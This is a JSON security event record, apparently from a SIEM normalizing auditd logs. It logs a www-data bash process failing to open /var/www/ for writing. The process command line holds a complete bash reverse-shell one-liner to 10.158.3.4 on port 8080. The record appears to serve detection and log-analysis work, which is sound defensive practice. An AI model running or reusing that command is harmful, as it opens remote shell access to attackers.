{
  "action": "access",
  "object": "file_object",
  "status": "failure",
  "category.generic": "File System Object",
  "category.high": "System Management",
  "category.low": "Manipulation",
  "chain_id": "55133",
  "datafield1": "bash",
  "event_src.category": "Operating system",
  "event_src.ip": "10.125.136.66",
  "event_src.rule": "pt_siem_home_access",
  "event_src.subsys": "auditd",
  "event_src.title": "unix_like",
  "id": "PT_UNIX_like_auditd_syslog_structured_syscall_file_operations",
  "importance": "low",
  "labels": "node_contains_ext_ip",
  "msgid": "openat",
  "object.account.group": "www-data",
  "object.account.id": "33",
  "object.account.name": "www-data",
  "object.path": "/var/www/",
  "object.property": "flags",
  "object.state": "w",
  "object.value": "O_WRONLY|O_CREAT|O_TRUNC",
  "reason": "Permission denied",
  "subject.account.id": "33",
  "subject.account.name": "www-data",
  "subject.account.privileges": "33",
  "subject.account.session_id": "4294967295",
  "subject.process.cwd": "/var/www/html",
  "subject.process.fullpath": "/usr/bin/bash",
  "subject.process.id": "132234",
  "subject.process.meta": "bash -c bash -i >& /dev/tcp/10.158.3.4/8080 0>&1",
  "subject.process.name": "bash",
  "subject.process.parent.id": "132233",
  "subject.process.path": "/usr/bin/",
  "time": "2022-09-26T09:07:28.000Z"
}